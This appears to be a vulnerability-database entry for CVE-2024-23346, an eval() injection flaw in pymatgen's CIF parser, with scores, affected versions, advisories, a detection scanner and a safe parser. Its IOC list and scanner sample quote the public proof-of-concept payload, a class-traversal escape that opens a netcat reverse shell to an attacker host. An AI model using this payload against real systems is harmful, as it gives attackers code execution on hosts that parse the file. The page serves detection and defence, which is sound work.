CVE-2024-23346
Published 2024-02-21
CVSS 3.1: 7.8 (High) · AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Exploit: public PoC available
EPSS: 3.82% (88.7th percentile)
Pymatgen (Python Materials Genomics) is an open-source Python library for materials analysis. A critical security vulnerability exists in the `JonesFaithfulTransformation.from_transformation_str()` method within the `pymatgen` library prior to version 2024.2.20. This method insecurely utilizes `eval()` for processing input, enabling execution of arbitrary code when parsing untrusted input. Version 2024.2.20 fixes this issue.
Affected (6 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | pymatgen | < pymatgen 2022.11.7+dfsg1-11+deb12u1 (bookworm) | pymatgen 2022.11.7+dfsg1-11+deb12u1 (bookworm) |
| materialsproject | pymatgen | < 2024.2.20 | 2024.2.20 |
| materialsvirtuallab | pymatgen | < 2024.2.20 | 2024.2.20 |
| pymatgen | pymatgen | >= 0 < 2022.11.7+dfsg1-11+deb12u1 | 2022.11.7+dfsg1-11+deb12u1 |
| pymatgen | pymatgen | >= 0 < 2024.1.27+dfsg1-6 | 2024.1.27+dfsg1-6 |
| pymatgen | pymatgen | >= 0 < 2024.2.20 | 2024.2.20 |
Detection & IOCs (extracted from sources)
- Payload (command) from the public PoC, exactly as published: `[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+ ["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("busybox nc 10.10.14.14 4242 -e /bin/bash");0,0,0`
- Payload template (command) with the callback left as placeholders: `[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+ ["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("nc {ip} {port} -e /bin/bash");0,0,0`
- Malicious CIF files exploiting CVE-2024-23346 carry a crafted `_space_group_magn.transform_BNS_Pp_abc` value. Instead of a transformation such as `a,b,c;0,0,0`, the field holds a Python expression that walks from the literal `()` through `__class__` and `__mro__` to `object`, enumerates its subclasses to reach `BuiltinImporter`, loads `os` and calls `os.system()`. The trailing `;0,0,0` keeps the string in the `<basis>;<origin shift>` shape the parser expects. The class traversal is how the payload reaches `os` without any builtin name being available to the evaluated expression; the "eval() sandbox" it escapes is that restriction, which is not a security boundary.
- Detect CIF uploads whose `_space_group_magn.transform_BNS_Pp_abc` value contains `__mro__`, `__class__` or `BuiltinImporter`; that field is the injection point for this exploit. Note that the public payload already writes `__subclasses__` as `"__sub" + "classes__"` to defeat a literal match, so the stronger check is structural: a legitimate value uses only `a`, `b`, `c`, digits, `+ - * /`, parentheses, commas and one semicolon, and anything outside that alphabet cannot be a valid transformation string.
- The audit creation method string `CVE-2024-23346 Pymatgen CIF Parser Reverse Shell Exploit` or `Pymatgen CIF Parser Arbitrary Code Execution Exploit` appears verbatim in the public PoC CIF files and can be used as a file-content signature.
- The PoC uses the data block identifier `data_5yOhtAoR`; this static string appears in known PoC CIF files and can serve as a file-content IOC.
- The vulnerable code path is `JonesFaithfulTransformation.from_transformation_str()` in pymatgen. Monitor for pymatgen versions prior to 2024.2.20 parsing externally supplied CIF files, and treat any direct call of that method on an untrusted string the same way: the CIF parser is only the most common route to it.
- The reverse-shell IP and port embedded in the payload (`busybox nc 10.10.14.14 4242`) are attacker-controlled and will vary per campaign; do not rely on these specific values for detection.
- The exploit triggers only when the application calls `CifParser.parse_structures()` (or another API that ends up in the CIF parser, such as loading a `.cif` file through `Structure.from_file()`) on an attacker-supplied file; the vulnerability is in parsing, not merely in file upload.
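As an added example (not pymatgen's code and not from any of the sources listed on this page), the following Python scanner applies both kinds of check from the list above to CIF text: the weak token match and the stronger grammar-alphabet check on the `_space_group_magn.transform_BNS_Pp_abc` value, plus the file-level IOC strings. The CIF field extraction is a minimal reading of the format (single-line bare or quoted values and `;`-delimited text fields, no `loop_` handling) and is an assumption of this example; both CIF snippets are constructed, and the malicious one keeps the `{ip}`/`{port}` placeholders and is only scanned, never evaluated.

```python
"""Scan CIF text for CVE-2024-23346 payloads in the field pymatgen feeds to eval().

Added example, not pymatgen code. The two CIF snippets at the bottom are constructed."""
import re

# The CIF data item that reaches JonesFaithfulTransformation.from_transformation_str().
TARGET_TAG = "_space_group_magn.transform_BNS_Pp_abc"

# Weak check: literal tokens from the public PoC. The PoC already writes
# "__sub" + "classes__" to dodge a match on "__subclasses__", so this list alone is bypassable.
INDICATORS = ("__mro__", "__class__", "__subclasses__", "BuiltinImporter",
              "load_module", "__import__", "system")

# Strong check: a genuine Jones-faithful string ("a,b,c;0,0,0", "-a+b,c,2a;1/2,0,0")
# only ever uses these characters, so anything else cannot be a valid transformation.
GRAMMAR_ALPHABET = re.compile(r"^[abc0-9+\-*/().,;\s]*$")

# File-level IOCs quoted on this page; attacker-controlled and trivially changed.
FILE_IOCS = ("data_5yOhtAoR",
             "CVE-2024-23346 Pymatgen CIF Parser Reverse Shell Exploit",
             "Pymatgen CIF Parser Arbitrary Code Execution Exploit")


def extract_tag_values(cif_text, tag=TARGET_TAG):
    """Return every value assigned to `tag`: bare, 'quoted', "quoted" or a ;-delimited text field.
    Deliberately minimal CIF handling (no loop_ blocks); enough for this one data item."""
    lines = cif_text.splitlines()
    tag_re = re.compile(r"\s*" + re.escape(tag) + r"(?:\s+(.*))?$", re.IGNORECASE)
    values, i = [], 0
    while i < len(lines):
        m = tag_re.match(lines[i])
        i += 1
        if not m:
            continue
        value = (m.group(1) or "").strip()
        if not value and i < len(lines) and lines[i].startswith(";"):
            block = [lines[i][1:]]          # text field runs to the next line starting with ';'
            i += 1
            while i < len(lines) and not lines[i].startswith(";"):
                block.append(lines[i])
                i += 1
            i += 1
            value = "\n".join(block).strip()
        elif len(value) >= 2 and value[0] in "'\"" and value[-1] == value[0]:
            value = value[1:-1]
        values.append(value)
    return values


def classify_value(value):
    """Return (verdict, reasons) for one transformation-field value."""
    reasons = []
    if not GRAMMAR_ALPHABET.match(value):
        illegal = "".join(sorted({ch for ch in value if not GRAMMAR_ALPHABET.match(ch)}))
        reasons.append(f"characters outside the transformation grammar: {illegal[:16]!r}")
    hits = [tok for tok in INDICATORS if tok in value]
    if hits:
        reasons.append("indicator tokens: " + ", ".join(hits))
    return ("malicious" if reasons else "ok"), reasons


def scan_cif(cif_text):
    """Scan a whole CIF document: per-value verdicts plus file-level IOC hits."""
    findings = []
    for value in extract_tag_values(cif_text):
        verdict, reasons = classify_value(value)
        findings.append({"value": value[:80], "verdict": verdict, "reasons": reasons})
    return {"findings": findings,
            "file_iocs": [ioc for ioc in FILE_IOCS if ioc in cif_text],
            "malicious": any(f["verdict"] == "malicious" for f in findings)}


# Constructed samples. The malicious value mirrors the PoC shape quoted on this page with the
# callback left as the {ip}/{port} placeholders; it is only ever scanned, never evaluated.
BENIGN_CIF = """\
data_benign
_audit_creation_method 'constructed sample'
_space_group_magn.transform_BNS_Pp_abc 'a,b,c;0,0,0'
_cell_length_a 5.0
"""

MALICIOUS_CIF = """\
data_5yOhtAoR
_audit_creation_method 'CVE-2024-23346 Pymatgen CIF Parser Reverse Shell Exploit'
_space_group_magn.transform_BNS_Pp_abc '[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+ ["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("nc {ip} {port} -e /bin/bash");0,0,0'
"""

if __name__ == "__main__":
    for name, text in (("benign", BENIGN_CIF), ("malicious", MALICIOUS_CIF)):
        print(name, scan_cif(text))
```

The grammar check is the one to keep: it flags the PoC on its first character (`[`) and stays valid against a payload that renames or splits every token the indicator list knows about, while the token list and the file-level strings are useful only as cheap corroboration.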
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 7.8 | HIGH | CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| osv | | 7.8 | HIGH | |
| vendor_debian | | 9.3 | CRITICAL | |
The NVD vector rates the attack vector as local (AV:L): the code runs on whichever host parses the file. A service that parses uploaded CIF files exposes the same code path to remote input.
Debian
vendor_debian · 2024 · CVSS 9.3 (CRITICAL)
CVE-2024-23346: pymatgen (same description as the NVD text above)
Scope: local
bookworm: resolved (fixed in 2022.11.7+dfsg1-11+deb12u1)
sid: resolved (fixed in 2024.1.27+dfsg1-6)
trixie: resolved (fixed in 2024.1.27+dfsg1-6)
OSV
osv · 2024-02-21 · CVSS 7.8 (HIGH)
CVE-2024-23346: Pymatgen (Python Materials Genomics) is an open-source Python library for materials analysis (same description as the NVD text above)
GHSA
ghsa · 2024-02-21 · CRITICAL · CWE-77
pymatgen vulnerable to arbitrary code execution when parsing a maliciously crafted JonesFaithfulTransformation transformation_string
### Summary
A critical security vulnerability exists in the `JonesFaithfulTransformation.from_transformation_str()` method within the `pymatgen` library. This method insecurely utilizes eval() for processing input, enabling execution of arbitrary code when parsing untrusted input. This can be exploited when parsing a maliciously-created CIF file.
### Details
The cause of the vulnerability is in [pymatgen/symmetry/settings.py#L97C1-L111C108](https://github.com/materialsproject/pymatgen/blob/master/pymatgen/symmetry/settings.py#L97C1-L111C108). The flawed code segment involves a regular expression operation followed by the use of `eval()`.
#### Vulnerable co
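The advisory's vulnerable-code excerpt is cut off on this page. What follows is an added example, not pymatgen's own code (neither the vulnerable version nor the 2024.2.20 fix): a small recursive-descent parser that accepts exactly the transformation grammar and nothing else, next to `eval_basis_unsafely()`, a simplified reconstruction of the pattern the advisory describes (`eval()` with builtins removed) kept only to show that removing builtins does not block attribute traversal. `is_valid_transformation()` is a convenience validator introduced by this example, not a pymatgen API, and the matrix convention (the images of `a`, `b`, `c` become the columns of `P`) is this example's own.

```python
"""Jones-faithful transformation strings parsed without eval(). Added example; not pymatgen code."""
import re
from fractions import Fraction

# A value is an exact linear form ca*a + cb*b + cc*c + k, stored as four Fractions.
def _lin(ca=0, cb=0, cc=0, k=0): return tuple(Fraction(x) for x in (ca, cb, cc, k))
def _is_scalar(v): return v[0] == v[1] == v[2] == 0
def _add(u, v): return tuple(x + y for x, y in zip(u, v))
def _neg(u): return tuple(-x for x in u)

def _scale(u, v, div=False):
    # u*v or u/v; one operand must be a plain number so the basis change stays linear.
    if _is_scalar(u) and not div:
        u, v = v, u
    if not _is_scalar(v) or (div and v[3] == 0):
        raise ValueError("non-linear product, or division by a non-number or by zero")
    return tuple(x / v[3] if div else x * v[3] for x in u)

class _Parser:
    # expr := term (('+'|'-') term)* ; term := atom (('*'|'/'|juxtaposition) atom)*
    # atom := ('+'|'-') atom | integer | 'a'|'b'|'c' | '(' expr ')'
    def __init__(self, text):
        text = "".join(text.split())                       # whitespace carries no meaning
        bad = re.search(r"[^abc0-9+\-*/()]", text)        # '.', '_', '[', quotes, other letters
        if bad:
            raise ValueError(f"illegal character {bad.group()!r} at offset {bad.start()}")
        self.toks, self.pos = re.findall(r"\d+|[abc+\-*/()]", text) + [None], 0   # None = end

    def peek(self): return self.toks[self.pos]

    def take(self):
        self.pos += 1
        return self.toks[self.pos - 1]

    def expr(self):
        v = self.term()
        while self.peek() in ("+", "-"):
            op, rhs = self.take(), self.term()
            v = _add(v, rhs if op == "+" else _neg(rhs))
        return v

    def term(self):
        v = self.atom()
        while True:
            tok = self.peek()
            if tok in ("*", "/"):
                self.take()
                v = _scale(v, self.atom(), div=(tok == "/"))
            elif tok is not None and tok not in ("+", "-", ")"):
                v = _scale(v, self.atom())                 # juxtaposition: "2a", "a(b+c)"
            else:
                return v

    def atom(self):
        tok = self.take()
        if tok in ("+", "-"):                              # unary sign
            v = self.atom()
            return _neg(v) if tok == "-" else v
        if tok == "(":
            v = self.expr()
            if self.take() != ")":
                raise ValueError("missing ')'")
            return v
        if tok in ("a", "b", "c"):
            return _lin(*(1 if tok == s else 0 for s in "abc"))
        if tok is not None and tok.isdigit():
            return _lin(k=int(tok))
        raise ValueError(f"unexpected token {tok!r}")

def _parse(piece):
    parser = _Parser(piece)
    value = parser.expr()
    if parser.peek() is not None:
        raise ValueError(f"trailing input {parser.peek()!r}")
    return value

def parse_transformation_string(text):
    """Return (P, p): P has the images of a, b, c as columns (this example's convention), p is
    the origin shift. Anything outside the grammar raises ValueError instead of being executed."""
    parts = text.split(";")
    if len(parts) != 2:
        raise ValueError("expected '<basis>;<origin shift>'")
    basis, shift = parts[0].split(","), parts[1].split(",")
    if len(basis) != 3 or len(shift) != 3:
        raise ValueError("need three basis expressions and three shift components")
    cols, shifts = [_parse(x) for x in basis], [_parse(x) for x in shift]
    if any(v[3] != 0 for v in cols) or not all(_is_scalar(v) for v in shifts):
        raise ValueError("basis expressions take no constant term; shifts must be numbers")
    P = [[cols[j][i] for j in range(3)] for i in range(3)]   # expressions become columns
    return P, [v[3] for v in shifts]

def is_valid_transformation(text):
    try:
        return parse_transformation_string(text) is not None
    except ValueError:
        return False

def eval_basis_unsafely(expr):
    # Reconstruction of the pattern the advisory describes (NOT pymatgen's code): builtins removed,
    # but attribute access from a literal still works, the payload's first hop. Never use on untrusted input.
    a, b, c = (1, 0, 0), (0, 1, 0), (0, 0, 1)
    return eval(expr, {"__builtins__": None}, {"a": a, "b": b, "c": c})
```

The parser rejects the PoC payload at its first character, `[`, before anything is interpreted, and it rejects well-formed but non-linear input such as `a*b` as well. By contrast `eval_basis_unsafely("().__class__.__mro__[1].__name__")` returns `"object"` with no builtins available at all, which is exactly why the `{"__builtins__": None}` idiom is not a defence: the fix is to not evaluate the string as Python in the first place.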
No detection rules found.
References
- https://github.com/materialsproject/pymatgen/blob/master/pymatgen/symmetry/settings.py#L97C1-L111C108
- https://github.com/materialsproject/pymatgen/commit/c231cbd3d5147ee920a37b6ee9dd236b376bcf5a
- https://github.com/materialsproject/pymatgen/security/advisories/GHSA-vgv8-5cpj-qj2f
- https://www.vicarius.io/vsociety/posts/critical-security-flaw-in-pymatgen-library-cve-2024-23346